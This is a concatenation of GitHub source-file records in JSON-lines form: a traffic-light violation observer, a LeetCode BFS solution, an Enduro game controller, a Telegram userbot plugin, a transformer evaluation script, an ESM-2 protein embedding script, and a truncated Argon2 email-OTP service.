bottom_right(self):\n \"\"\"\n :return: coordinates of bottom right corner of bounding box\n \"\"\"\n\n return self._bottom_right\n\n @property\n def car_id(self):\n \"\"\"\n :return: car id observed by this bounding box\n \"\"\"\n\n return self._car_id\n\n @property\n def initialized(self):\n \"\"\"\n :return: if bounding box is set\n \"\"\"\n\n return self._top_left is not None\n\n @property\n def lifetime(self):\n \"\"\"\n :return: lifetime of this bounding box.\n \"\"\"\n\n return self._lifetime\n\n @property\n def tracker_point(self):\n \"\"\"\n :return: coordinates of tracker point - center of bounding box bottom line\n \"\"\"\n\n return Coordinates((self._bottom_right[0] + self._top_left[0]) / 2, self._bottom_right[1])\n\n @property\n def front_point(self):\n \"\"\"\n :return: coordinates of front point - center of bounding box top line\n \"\"\"\n\n return Coordinates((self._bottom_right[0] + self._top_left[0]) / 2, self._top_left[1])\n\n @property\n def center_point(self):\n \"\"\"\n :return: center point of bounding box\n \"\"\"\n\n return Coordinates((self._bottom_right[0] + self._top_left[0]) / 2, (self._bottom_right[1] + self._top_left[1]) / 2)\n\n def get_corridor(self, info):\n \"\"\"\n Returns ID of corridor in which the tracked point of this bounding box lays\n\n :param info: instance of InputInfo used for getting corridor repository references\n :return: id of corridor\n \"\"\"\n\n return info.corridors_repository.get_corridor(self.tracker_point)\n\n def distance_from_vanishing_point(self, info):\n \"\"\"\n :param info: instance of InputInfo used for getting vanishing point references\n :return: distance from vanishing point in pixels\n \"\"\"\n return info.vp1.coordinates.distance(self.tracker_point)\n\n def tic(self):\n \"\"\"\n On each frame is 1 subtracted from bounding box lifetime\n \"\"\"\n self._lifetime -= 1\n\n def update(self, anchors, lights_state, info, velocity):\n \"\"\"\n Updates position, velocity and behavior depending on passed light state.\n On each update history of center points is saved for trajectory printing.\n\n :param anchors: new anchor position\n :param lights_state: current light state\n :param info: instance of InputInfo\n :param velocity: velocity of observed car\n :return: classification of behaviour of car\n \"\"\"\n previous_coordinates = None\n\n if self.initialized:\n previous_coordinates = self.tracker_point\n\n self._top_left, self._bottom_right, _ = anchors\n self._lifetime += 1\n\n if previous_coordinates is not None:\n if lights_state == Color.RED or lights_state == Color.RED_ORANGE:\n if info.corridors_repository.line_crossed(previous_coordinates, self.tracker_point):\n self._behaviour = CarBehaviourMode.RED_DRIVER\n\n if self._behaviour == CarBehaviourMode.LINE_CROSSED:\n self._red_distance_traveled += velocity\n\n if lights_state == Color.ORANGE:\n if info.corridors_repository.line_crossed(previous_coordinates, self.tracker_point):\n self._behaviour = CarBehaviourMode.ORANGE_DRIVER\n\n if lights_state == Color.GREEN and self._behaviour not in [CarBehaviourMode.ORANGE_DRIVER, CarBehaviourMode.RED_DRIVER]:\n if info.corridors_repository.line_crossed(previous_coordinates, self.tracker_point):\n self._behaviour = CarBehaviourMode.LINE_CROSSED\n\n if not len(self._history) or np.abs(self.center_point.y - self._history[-1].y) > 20:\n self._history.append(self.center_point)\n\n return self._behaviour\n\n def draw_boxes(self, image):\n \"\"\"\n Helper method for draw bounding box with color corresponding to behaviour\n\n :param image: selected image to draw on\n :return: updated image\n \"\"\"\n\n if self._behaviour == CarBehaviourMode.RED_DRIVER:\n color = constants.COLOR_RED\n elif self._behaviour == CarBehaviourMode.ORANGE_DRIVER:\n color = constants.COLOR_ORANGE\n else:\n color = constants.COLOR_GREEN\n\n cv2.rectangle(img=image,\n pt1=self._top_left,\n pt2=self._bottom_right,\n color=color,\n thickness=constants.OBSERVER_BOX_THICKNESS)\n\n cv2.rectangle(img=image,\n pt1=self._top_left,\n pt2=(self._top_left[0] + 30, self._top_left[1] - 15),\n color=color,\n thickness=constants.FILL)\n\n cv2.circle(img=image,\n center=self.tracker_point.tuple(),\n color=constants.COLOR_RED,\n radius=5,\n thickness=constants.FILL)\n\n cv2.putText(img=image,\n text=self.car_id,\n org=self._top_left,\n fontFace=1,\n fontScale=1,\n color=constants.COLOR_BLACK,\n thickness=2)\n\n return image\n\n def draw_trajectories(self, image, method=\"second\"):\n \"\"\"\n Helper method for drawing car trajectories (trajectories of center point)\n\n :param image: selected image\n :param method: method of trajectory obtaining to be printed\n :return: updated image\n \"\"\"\n\n if method == \"second\":\n for index, point in enumerate(self._history):\n cv2.circle(img=image,\n center=point.tuple(),\n color=constants.COLOR_BLUE,\n radius=5,\n thickness=constants.FILL)\n\n try:\n cv2.line(img=image,\n pt1=point.tuple(),\n pt2=self._history[index + 1].tuple(),\n color=constants.COLOR_BLUE,\n thickness=2)\n\n except IndexError:\n pass\n\n if method == \"first\":\n try:\n Line(self._history[0].tuple(), self._history[-1].tuple()).draw(image, constants.COLOR_RED, 1)\n except SamePointError:\n return\n\n cv2.circle(img=image,\n center=self._history[0].tuple(),\n color=constants.COLOR_BLUE,\n radius=5,\n thickness=constants.FILL)\n\n cv2.circle(img=image,\n center=self._history[-1].tuple(),\n color=constants.COLOR_BLUE,\n radius=5,\n thickness=constants.FILL)\n\n cv2.line(img=image,\n pt1=self._history[0].tuple(),\n pt2=self._history[-1].tuple(),\n color=constants.COLOR_BLUE,\n thickness=2)\n\n position_history = [coordinates.tuple() for coordinates in self._history]\n line, value = ransac(position_history, position_history, 1)\n\n if line is not None and value > 5:\n line.draw(image, constants.COLOR_RED, 2)\n\n def __str__(self):\n return f\"[Box id: {self._car_id}]\"\n\n\nclass BBoxRepository:\n \"\"\"\n Bounding boxes repository.\n Holds all instances of bounding boxes in separate dictionaries\n \"\"\"\n\n def __init__(self):\n self._boxes = {}\n self._red_riders = {}\n self._orange_riders = {}\n self._all_cars = {}\n\n @property\n def boxes(self):\n \"\"\"\n :return: all bouniding boxes\n \"\"\"\n\n return self._boxes\n\n @property\n def red_riders(self):\n \"\"\"\n :return: all red drivers\n \"\"\"\n\n return self._red_riders\n\n @property\n def orange_riders(self):\n \"\"\"\n :return: all orange drivers\n \"\"\"\n\n return self._orange_riders\n\n @property\n def car_count(self):\n \"\"\"\n :return: total car count\n \"\"\"\n\n return len(self._all_cars)\n\n @property\n def red_drivers_count(self):\n \"\"\"\n :return: number of red rivers\n \"\"\"\n\n return len(self._red_riders)\n\n @property\n def orange_drivers_count(self):\n \"\"\"\n :return: orange drivers count\n \"\"\"\n\n return len(self._orange_riders)\n\n def get_boxes_in_corridors(self, info):\n \"\"\"\n :param info: instance of InputInfo used for corridor assigning\n :return: dictionary of assigned bounding boxes to corresponding traffic corridors\n \"\"\"\n\n if info.vp1 is None or not info.corridors_repository.corridors_found:\n return {}\n\n corridor_ids = info.corridors_repository.corridor_ids\n sorted_boxes = sorted(self._boxes.values(), key=lambda b: b.distance_from_vanishing_point(info))\n\n return {corridor: [box for box in sorted_boxes if box.get_corridor(info) == corridor]for corridor in corridor_ids}\n\n def insert_or_update(self, anchors, car_id, velocity, lights_state, info, seq):\n \"\"\"\n Updates or creates new instance of bounding box identified by car ID.\n If red or orange driver is detected, then it instance is being saved into corresponding dictionary\n\n :param anchors: anchor points of observed car box\n :param car_id: unique car id\n :param velocity: velocity of car\n :param lights_state: current light state\n :param info: instance of InputInfo for behaviour classification\n :param seq: current sequence number\n \"\"\"\n\n if car_id not in self._boxes:\n self._boxes[car_id] = Box2D(car_id)\n\n behaviour = self._boxes[car_id].update(anchors, lights_state, info, velocity)\n\n if behaviour in [CarBehaviourMode.ORANGE_DRIVER, CarBehaviourMode.RED_DRIVER, CarBehaviourMode.LINE_CROSSED]:\n if car_id not in self._all_cars:\n self._all_cars[car_id] = seq\n\n if behaviour == CarBehaviourMode.RED_DRIVER:\n try:\n self._orange_riders.pop(car_id)\n except KeyError:\n pass\n\n if car_id not in self._red_riders:\n self._red_riders[car_id] = seq\n\n if behaviour == CarBehaviourMode.ORANGE_DRIVER:\n if car_id not in self._orange_riders:\n self._orange_riders[car_id] = seq\n\n def check_lifetime(self):\n \"\"\"\n Control lifetime of all bounding boxes, if any of them has lifetime less then 0 it is not updated for a while\n -> it is removed from observed bouning boxes\n \"\"\"\n\n for key, box in self._boxes.copy().items():\n box.tic()\n if box.lifetime < 0:\n self._boxes.pop(key)\n\n def draw_boxes(self, image):\n \"\"\"\n Helper function for drawing all present boxes on image\n\n :param image: selected image to draw on\n :return: updated image\n \"\"\"\n\n for key, box in self._boxes.items():\n box.draw_boxes(image)\n\n return image\n\n def draw_trajectories(self, image):\n \"\"\"\n Helper function for drawing all trajectories of all center points of observed bounding boxes\n\n :param image: selected image\n :return: updated image\n \"\"\"\n\n image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\n image = cv2.cvtColor(image, cv2.COLOR_GRAY2RGB)\n\n for key, box in self._boxes.items():\n box.draw_trajectories(image)\n\n return image\n\n def get_box_by_id(self, car_id):\n \"\"\"\n :param car_id: desired car ID\n :return: instance of bounding box with desired ID\n \"\"\"\n\n return self._boxes[car_id]\n\n def draw_statistics(self, image, info):\n \"\"\"\n Helper function to draw statistics panel about passed cars on selected image\n\n :param image: selected image\n :param info: instance of InputInfo\n :return: updated image\n \"\"\"\n\n statistics_panel = np.full(shape=(30, info.width, 3),\n dtype=np.uint8,\n fill_value=constants.COLOR_WHITE)\n\n cv2.putText(img=statistics_panel,\n text=f\"Total car count: {self.car_count}\",\n org=(10, 20),\n fontFace=1,\n fontScale=1,\n color=constants.COLOR_BLACK,\n thickness=1)\n\n cv2.putText(img=statistics_panel,\n text=f\"Red drivers: {self.red_drivers_count}\",\n org=(300, 20),\n fontFace=1,\n fontScale=1,\n color=constants.COLOR_BLACK,\n thickness=1)\n\n cv2.putText(img=statistics_panel,\n text=f\"Orange drivers: {self.orange_drivers_count}\",\n org=(500, 20),\n fontFace=1,\n fontScale=1,\n color=constants.COLOR_BLACK,\n thickness=1)\n\n return np.concatenate((statistics_panel, image), axis=0)\n\n def get_statistics(self):\n \"\"\"\n Provides serialized statistics in form of dictionary.\n\n :return: dictionary of serialized statistics\n \"\"\"\n\n return {\n \"total_cars_count\": self.car_count,\n \"red_drivers_count\": self.red_drivers_count,\n \"orange_drivers_count\": self.orange_drivers_count,\n \"red_drivers\": self.red_riders,\n \"orange_drivers\": self.orange_riders,\n \"all_drivers\": self._all_cars\n }\n\n def restart(self):\n \"\"\"\n Clears all dictionaries containing instances of bounding boxes.\n \"\"\"\n\n self._boxes = {}\n self._red_riders = {}\n self._orange_riders = {}\n self._all_cars = {}\n\n\nclass Observer(ThreadedPipeBlock):\n \"\"\"\n Observes the scene and combines obtained information about car and light objects.\n On every step deepcopy of BBoxRepository is send to output PipeBocks.\n\n While working in calibration mode it helps with detecting stop line by examining car behaviour on certain light\n states.\n \"\"\"\n\n def __init__(self, info, output, pipe_id=constants.OBSERVER_ID):\n \"\"\"\n :param info: instance of InputInfo\n :param output: list of output instances of PipeBlock\n :param pipe_id: unique ID of this PipeBlock subclass\n \"\"\"\n\n super().__init__(pipe_id=pipe_id,\n output=output,\n info=info)\n\n self._previous_lights_state = None\n self._bounding_boxes_repository = BBoxRepository()\n\n def _mode_changed(self, new_mode):\n \"\"\"\n When detection mode starts BBoxRepositories are cleared.\n\n :param new_mode: new mode\n \"\"\"\n\n super()._mode_changed(new_mode)\n\n if new_mode == Mode.DETECTION:\n self._bounding_boxes_repository.restart()\n\n def _step(self, seq):\n \"\"\"\n Each step serialized tracked objects are received from Tracker.\n light states are received from TrafficLightObserver.\n For ever serialized tracked object is updated or inserted new bounding box using BBoxRepository\n\n If current light status is certain value and stop line is not found, then\n position of first car in every corridor is being used for it approximation.\n\n :param seq: current sequnece number\n \"\"\"\n\n tracker_seq, tracked_objects = self.receive(pipe_id=constants.TRACKER_ID)\n lights_seq, current_lights_state = self.receive(pipe_id=constants.TRAFFIC_LIGHT_OBSERVER_ID)\n\n for tracked_object in tracked_objects:\n anchors, _, car_info, car_velocity = tracked_object\n self._bounding_boxes_repository.insert_or_update(anchors, car_info, car_velocity, current_lights_state, self._info, seq)\n\n self._bounding_boxes_repository.check_lifetime()\n\n if self._previous_lights_state in [Color.RED_ORANGE, Color.RED] and current_lights_state == Color.GREEN:\n if not self._info.corridors_repository.stopline_found:\n boxes_in_corridors = self._bounding_boxes_repository.get_boxes_in_corridors(info=self._info)\n\n for corridors in boxes_in_corridors.values():\n try:\n first_car = corridors[0]\n self._info.corridors_repository.add_stop_point(first_car.center_point)\n except IndexError:\n continue\n\n if is_frequency(seq, constants.VIDEO_PLAYER_FREQUENCY):\n message = seq, deepcopy(self._bounding_boxes_repository), current_lights_state\n self.send(message, pipe_id=constants.VIDEO_PLAYER_ID, block=False)\n\n if is_frequency(seq, constants.VIOLATION_WRITER_FREQUENCY):\n message = seq, deepcopy(self._bounding_boxes_repository), current_lights_state\n self.send(message, pipe_id=constants.VIOLATION_WRITER_ID)\n\n self._previous_lights_state = current_lights_state\n","repo_name":"Karpisek/BP","sub_path":"pipeline/observer.py","file_name":"observer.py","file_ext":"py","file_size_in_byte":18505,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"40250564457","text":"\"\"\"\n# Definition for Employee.\nclass Employee:\n def __init__(self, id: int, importance: int, subordinates: List[int]):\n self.id = id\n self.importance = importance\n self.subordinates = subordinates\n\"\"\"\n\nclass Solution:\n def getImportance(self, employees: List['Employee'], id: int) -> int:\n graph = defaultdict(list)\n importanceMap = {}\n for i in range(len(employees)):\n importanceMap[employees[i].id] = employees[i].importance\n for nei in employees[i].subordinates:\n graph[employees[i].id].append(nei)\n \n queue = deque([id])\n visited = set([id])\n res = 0\n while queue:\n node = queue.popleft()\n res += importanceMap[node]\n for nei in graph[node]:\n if nei not in visited:\n queue.append(nei)\n \n return res","repo_name":"Naboni/Competitive-Programming","sub_path":"Graph/EmployeeImportance.py","file_name":"EmployeeImportance.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2720849231","text":"from enduro.action import Action\n\n\nclass Controller:\n def __init__(self, ale):\n self._ale = ale\n\n def move(self, action):\n reward = 0\n repeat = 4 if action == Action.ACCELERATE else 8\n\n for i in range(repeat):\n reward += self._ale.act(action)\n\n return reward\n","repo_name":"ipab-rad/rl-cw1","sub_path":"enduro/control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"73569410294","text":"\"\"\"Corona: Avaible commands: .ripper <cname>\n\"\"\"\nimport datetime\nfrom telethon import events\nfrom telethon.errors.rpcerrorlist import YouBlockedUserError\nfrom telethon.tl.functions.account import UpdateNotifySettingsRequest\nfrom uniborg.util import admin_cmd\n\n@borg.on(admin_cmd(pattern=\"ripper ?(.*)\"))\nasync def _(event):\n if event.fwd_from:\n return \n input_str = event.pattern_match.group(1)\n reply_message = await event.get_reply_message()\n chat = \"@mrhacker_genuine_bot\"\n await event.edit(\"```Thankyou User Reported @sensible_userbot Ripper Team Will Check This And If user Found So That User Will Be Globally Banned...```\")\n async with event.client.conversation(chat) as conv:\n try: \n response = conv.wait_event(events.NewMessage(incoming=True,from_users=1254445279))\n await event.client.send_message(chat, \"{}\".format(input_str))\n response = await response \n except YouBlockedUserError: \n await event.reply(\"```Abey (@mrhacker_genuine_bot) Ko Unblock Kar```\")\n return\n if response.text.startswith(\"Ripper\"):\n await event.edit(\"😐**Abe Lode Code Churane Aya Hei kya 😎Bhak bhosdike\")\n else: \n await event.delete()\n await event.client.send_message(event.chat_id, response.message)","repo_name":"hellboi-atul/dArK_pRiNcE","sub_path":"userbot/plugins/ripper.py","file_name":"ripper.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"4774739552","text":"import argparse\nimport logging\nimport os\nimport random\nfrom datetime import datetime\nfrom pathlib import Path\n\nimport datasets\nimport torch\nimport transformers\nfrom accelerate import Accelerator, DistributedDataParallelKwargs\nfrom data_collator import CustomDataCollator\nfrom datasets import load_from_disk, load_metric\nfrom huggingface_hub import Repository\nfrom longformer import get_attention_injected_model\nfrom model_utils import (\n copy_proj_layers,\n pretrained_masked_model_selector,\n pretrained_model_selector,\n pretrained_sequence_model_selector,\n)\nfrom models import HierarchicalClassificationModel\nfrom torch.utils.data import DataLoader\nfrom transformers import (\n AutoConfig,\n AutoModelForSequenceClassification,\n AutoTokenizer,\n DataCollatorWithPadding,\n set_seed,\n)\nfrom transformers.file_utils import get_full_repo_name\nfrom transformers.utils.versions import require_version\nfrom utils import (\n MODEL_MAPPING,\n custom_tokenize,\n load_args,\n path_adder,\n preprocess_function,\n select_base,\n)\n\nlogger = logging.getLogger(__name__)\n\nrequire_version(\n \"datasets>=1.8.0\",\n \"To fix: pip install -r examples/pytorch/text-classification/requirements.txt\",\n)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description=\"Finetune the hierarchical model on a text classification task\"\n )\n parser.add_argument(\n \"--test_file\",\n type=str,\n default=None,\n help=\"A csv or a json file containing the training data.\",\n )\n parser.add_argument(\n # Modified\n \"--max_seq_length\",\n type=int,\n default=None,\n help=(\n \"The maximum total input sequence length after tokenization. Sequences longer than this will be truncated,\"\n \" sequences shorter will be padded if `--pad_to_max_lengh` is passed.\"\n ),\n )\n parser.add_argument(\n \"--pad_to_max_length\",\n action=\"store_true\",\n help=\"If passed, pad all samples to `max_length`. Otherwise, dynamic padding is used.\",\n )\n parser.add_argument(\n # Modified\n \"--finetuned_dir\",\n type=str,\n help=\"Path to the output directory of finetuning.\",\n required=True,\n )\n parser.add_argument(\n \"--use_slow_tokenizer\",\n action=\"store_true\",\n help=\"If passed, will use a slow tokenizer (not backed by the 🤗 Tokenizers library).\",\n )\n parser.add_argument(\n \"--overwrite_cache\",\n type=bool,\n default=False,\n help=\"Overwrite the cached training and evaluation sets\",\n )\n parser.add_argument(\n \"--per_device_eval_batch_size\",\n type=int,\n default=8,\n help=\"Batch size (per device) for the evaluation dataloader.\",\n )\n parser.add_argument(\n \"--output_dir\", type=str, default=None, help=\"Where to store the final model.\"\n )\n parser.add_argument(\n \"--seed\", type=int, default=None, help=\"A seed for reproducible training.\"\n )\n parser.add_argument(\n \"--push_to_hub\",\n action=\"store_true\",\n help=\"Whether or not to push the model to the Hub.\",\n )\n parser.add_argument(\n \"--hub_model_id\",\n type=str,\n help=\"The name of the repository to keep in sync with the local `output_dir`.\",\n )\n parser.add_argument(\n \"--hub_token\", type=str, help=\"The token to use to push to the Model Hub.\"\n )\n # Modified:\n parser.add_argument(\n \"--preprocessing_num_workers\",\n type=int,\n default=None,\n help=\"The number of processes to use for the preprocessing.\",\n )\n parser.add_argument(\n \"--max_document_length\",\n type=int,\n default=None,\n required=True,\n help=\"The maximum number of sentences each document can have. Documents are either truncated or\"\n \"padded if their length is different.\",\n )\n parser.add_argument(\n \"--custom_model\",\n type=str,\n help=\"If a custom model is to be used, the model type has to be specified.\",\n default=None,\n choices=[\"hierarchical\", \"sliding_window\", \"longformer\"],\n )\n args = parser.parse_args()\n\n # Sanity checks\n if args.test_file is None:\n raise ValueError(\"Need testing file.\")\n\n if args.push_to_hub:\n assert (\n args.output_dir is not None\n ), \"Need an `output_dir` to create a repo when `--push_to_hub` is passed.\"\n\n return args\n\n\ndef main():\n # Modified: classification arguments\n args = parse_args()\n\n # TODO: change the logic\n # Argments from pretraining\n if args.custom_model == \"hierarchical\":\n pretrained_args = load_args(\n os.path.join(args.finetuned_dir, \"pretrained_args.json\")\n )\n args.use_sliding_window_tokenization = getattr(\n pretrained_args, \"use_sliding_window_tokenization\", False\n )\n elif args.custom_model == \"sliding_window\":\n args.use_sliding_window_tokenization = True\n finetuned_args = load_args(os.path.join(args.finetuned_dir, \"args.json\"))\n\n # Initialize the accelerator. We will let the accelerator handle device placement for us in this example.\n ddp_kwargs = DistributedDataParallelKwargs(find_unused_parameters=True)\n accelerator = Accelerator(kwargs_handlers=[ddp_kwargs])\n\n # Handle the repository creation\n if accelerator.is_main_process:\n if args.push_to_hub:\n if args.hub_model_id is None:\n repo_name = get_full_repo_name(\n Path(args.output_dir).name, token=args.hub_token\n )\n else:\n repo_name = args.hub_model_id\n repo = Repository(args.output_dir, clone_from=repo_name)\n elif args.output_dir is not None:\n # Modified: output_dir is concatanated with datetime and command line arguments are also saved\n # TODO: refactor\n if args.custom_model == \"hierarchical\":\n inter_path = path_adder(\n pretrained_args, finetuning=True, custom_model=args.custom_model\n )\n else:\n inter_path = path_adder(finetuned_args, finetuning=True)\n inter_path += datetime.now().strftime(\"%Y_%m_%d-%H_%M_%S\")\n args.output_dir = os.path.join(args.output_dir, inter_path)\n os.makedirs(args.output_dir, exist_ok=True)\n\n # Make one log on every process with the configuration for debugging.\n logging.basicConfig(\n format=\"%(asctime)s - %(levelname)s - %(name)s - %(message)s\",\n datefmt=\"%m/%d/%Y %H:%M:%S\",\n level=logging.INFO,\n # Modified\n handlers=[\n logging.FileHandler(os.path.join(args.output_dir, \"loginfo.log\")),\n logging.StreamHandler(),\n ],\n )\n logger.info(accelerator.state)\n\n # Setup logging, we only want one process per machine to log things on the screen.\n # accelerator.is_local_main_process is only True for one process per machine.\n logger.setLevel(\n logging.INFO if accelerator.is_local_main_process else logging.ERROR\n )\n if accelerator.is_local_main_process:\n datasets.utils.logging.set_verbosity_warning()\n transformers.utils.logging.set_verbosity_info()\n else:\n datasets.utils.logging.set_verbosity_error()\n transformers.utils.logging.set_verbosity_error()\n\n # If passed along, set the training seed now.\n if args.seed is not None:\n set_seed(args.seed)\n\n accelerator.wait_for_everyone()\n\n # Modified:\n test_dataset = load_from_disk(args.test_file)\n # Labels\n label_list = test_dataset.unique(\"labels\")\n label_list.sort() # Let's sort it for determinism\n num_labels = len(label_list)\n\n if args.custom_model == \"longformer\":\n tokenizer = AutoTokenizer.from_pretrained(\n args.finetuned_dir,\n max_length=args.max_seq_length,\n padding=\"max_length\",\n truncation=True,\n )\n else:\n tokenizer = AutoTokenizer.from_pretrained(args.finetuned_dir, use_fast=True)\n\n if args.custom_model in (\"hierarchical\", \"sliding_window\"):\n model = HierarchicalClassificationModel(\n c_args=finetuned_args,\n args=None if args.custom_model == \"sliding_window\" else pretrained_args,\n tokenizer=tokenizer,\n num_labels=num_labels,\n )\n model.load_state_dict(torch.load(os.path.join(args.finetuned_dir, \"model.pth\")))\n elif args.custom_model == \"longformer\":\n psm = pretrained_sequence_model_selector(select_base(args.finetuned_dir))\n model = get_attention_injected_model(psm)\n model = model.from_pretrained(\n args.finetuned_dir, max_length=args.max_seq_length, num_labels=num_labels\n )\n else:\n config = AutoConfig.from_pretrained(args.finetuned_dir, num_labels=num_labels)\n model = AutoModelForSequenceClassification.from_pretrained(\n args.finetuned_dir,\n config=config,\n )\n\n if args.custom_model in (\"hierarchical\", \"sliding_window\"):\n with accelerator.main_process_first():\n # Modified\n test_dataset = test_dataset.rename_column(\"text\", \"article_1\")\n ARTICLE_NUMBERS = 1\n test_dataset = test_dataset.map(\n custom_tokenize,\n fn_kwargs={\n \"tokenizer\": tokenizer,\n \"args\": args,\n \"article_numbers\": ARTICLE_NUMBERS,\n },\n num_proc=args.preprocessing_num_workers,\n load_from_cache_file=False,\n desc=\"Running tokenizer on dataset\",\n )\n else:\n with accelerator.main_process_first():\n test_dataset = test_dataset.map(\n preprocess_function,\n fn_kwargs={\n \"tokenizer\": tokenizer,\n \"max_seq_length\": args.max_seq_length,\n },\n batched=True,\n num_proc=args.preprocessing_num_workers,\n remove_columns=test_dataset.column_names,\n load_from_cache_file=False,\n desc=\"Running tokenizer on dataset\",\n )\n\n # Modified\n\n # Log a few random samples from the training set:\n for index in random.sample(range(len(test_dataset)), 3):\n logger.info(f\"Sample {index} of the training set: {test_dataset[index]}.\")\n\n if args.custom_model in (\"hierarchical\", \"sliding_window\"):\n ARTICLE_NUMBERS = 1\n data_collator = CustomDataCollator(\n tokenizer=tokenizer,\n max_sentence_len=pretrained_args.max_seq_length\n if args.max_seq_length is None\n else args.max_seq_length,\n max_document_len=pretrained_args.max_document_length\n if args.max_document_length is None\n else args.max_document_length,\n article_numbers=ARTICLE_NUMBERS,\n consider_dcls=True if args.custom_model == \"hierarchical\" else False,\n )\n elif args.custom_model == \"longformer\":\n data_collator = DataCollatorWithPadding(tokenizer, pad_to_multiple_of=512)\n else:\n data_collator = DataCollatorWithPadding(\n tokenizer, pad_to_multiple_of=(8 if accelerator.use_fp16 else None)\n )\n\n test_dataloader = DataLoader(\n test_dataset,\n collate_fn=data_collator,\n batch_size=args.per_device_eval_batch_size,\n )\n\n # Prepare everything with our `accelerator`.\n model, test_dataloader = accelerator.prepare(model, test_dataloader)\n\n # Modified: only accuracy.\n # Get the metric function\n metric = load_metric(\"accuracy\")\n\n model.eval()\n for batch in test_dataloader:\n # Modified for Hierarchical Classification Model\n with torch.no_grad():\n outputs = model(**batch)\n predictions = outputs.logits.argmax(dim=-1)\n metric.add_batch(\n predictions=accelerator.gather(predictions),\n references=accelerator.gather(batch[\"labels\"]),\n )\n\n eval_metric = metric.compute()\n logger.info(f\"final accuracy: {eval_metric}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ogaloglu/pre-training-multilingual-document-encoders","sub_path":"src/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":12234,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"74666906931","text":"import torch\nimport esm\nimport numpy as np\nimport argparse\nimport sys\nimport os\n\n#Yuzhen Ye, Indiana University, Nov 2023\n\nbatchsize = 1\n\ndef readfasta(filename):\n seqid, seqseq = [], []\n inf = open(filename, \"r\")\n for aline in inf:\n if aline[0] == '>':\n if len(seqid) == batchsize:\n yield seqid, seqseq\n seqid, seqseq = [], []\n seqid.append(aline[1:-1])\n seqseq.append(\"\")\n else:\n seqseq[-1] += aline.strip()\n yield seqid, seqseq\n inf.close()\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--input\", help=\"FASTA file\", required=True)\n parser.add_argument(\"--npy\", help=\"save embeddings and contact to files under the given folder (one for each protein)\", required=True)\n parser.add_argument(\"--gpu\", help=\"using gpu, otherwise using cpu\", required=False)\n parser.add_argument(\"--batchsize\", help=\"batchsize; default 1\", required=False)\n parser.add_argument(\"--overwrite\", help=\"redo if npy exists; otherwise skip if exists\", type=bool, default=False, required=False)\n args = parser.parse_args()\n\n if not os.path.exists(args.npy):\n os.mkdir(args.npy) \n\n if args.batchsize:\n batchsize = args.batchsize\n\n print(\"load model...\")\n torch.cuda.empty_cache()\n device = torch.device('cuda:0' if torch.cuda.is_available() and args.gpu else 'cpu')\n\n # Load ESM-2 model\n model, alphabet = esm.pretrained.esm2_t33_650M_UR50D()\n batch_converter = alphabet.get_batch_converter()\n model.eval() # disables dropout for deterministic results\n\n if args.gpu:\n model.to('cuda')\n\n fasta = readfasta(args.input) \n while True:\n try:\n seqid, seqseq = next(fasta)\n except:\n break\n data = []\n for idx in range(len(seqid)):\n filen = args.npy + \"/\" + seqid[idx] + \".npz\"\n if (not args.overwrite) and os.path.exists(filen):\n print(f\"seq {seqid[idx]} already exists\")\n continue\n if len(seqseq[idx]) > 6000:\n print(f\"seq {seqid[idx]} too long {len(seqseq[idx])}\")\n continue\n print(f\"seq {seqid[idx]} {len(seqseq[idx])}\")\n data.append((seqid[idx], seqseq[idx]))\n batch_labels, batch_strs, batch_tokens = batch_converter(data)\n batch_lens = (batch_tokens != alphabet.padding_idx).sum(1)\n if len(data) == 0:\n continue\n # Extract per-residue representations (on CPU)\n #batch_tokens = batch_tokens.to('cuda')\n with torch.no_grad():\n results = model(batch_tokens, repr_layers=[13, 25, 33], return_contacts=True)\n r33a = results[\"representations\"][33]\n r13a = results[\"representations\"][13]\n r25a = results[\"representations\"][25]\n cta = results[\"contacts\"]\n\n np.set_printoptions(threshold=sys.maxsize)\n emblist = []\n for (sid, seq), tokens_len, e13, e25, e33, ct in zip(data, batch_lens, r13a, r25a, r33a, cta):\n a = ct.numpy().flatten()\n filen = args.npy + \"/\" + sid\n np.savez_compressed(filen, s=seq, e13=e13, e25=e25, e33=e33, ct=ct)\nif __name__ == \"__main__\":\n main()\n","repo_name":"mgtools/DCTdomain","sub_path":"src/embed-mult.py","file_name":"embed-mult.py","file_ext":"py","file_size_in_byte":3262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39188167963","text":"from argon2 import PasswordHasher\nfrom argon2.exceptions import VerifyMismatchError\nfrom flask import render_template\nfrom flask_mail import Message\nimport random\nfrom dataclasses import asdict\n\nfrom src.application.dto.email_dto import CheckEmailInputDto, EmailCountDto, UserLock\nfrom src.domain.entities.email_entity import ArgonEntity\nfrom src.domain.value.otp import emailTemplate, emailTitle, emailBody, emailSender\nfrom src.domain.value.collection import usersCol, otpCol\nfrom src.domain.value.filed import lockStatusFiled\nfrom src.domain.value.exceptions import LockedUser, VerifyOTP\n\n\nclass EmailDomainService:\n def __init__(self, argon_entity: ArgonEntity):\n self._argon_entity = argon_entity\n\n def create_crypt_num(self, argon_entity: ArgonEntity):\n memory_cost = argon_entity.memoryCostLow << argon_entity.memoryCostHigh\n otp = random.randint(argon_entity.randomLow, argon_entity.randomHigh)\n hasher = PasswordHasher(argon_entity.timeCost, memory_cost, argon_entity.parallelism)\n str_otp = str(otp)\n crypt_otp = hasher.hash(str_otp)\n return otp, crypt_otp, hasher\n\n async def create_template(self, user_email):\n otp, hash_otp, _ = self.create_crypt_num(self._argon_entity)\n html_template = render_template(emailTemplate, OTP=otp)\n\n email_msg = Message(emailTitle, sender=emailSender, recipients=[user_email])\n email_msg.body = emailBody\n email_msg.html = html_template\n return otp, hash_otp, email_msg\n\n def check_user_status(self, email_repo, false_count, uid):\n 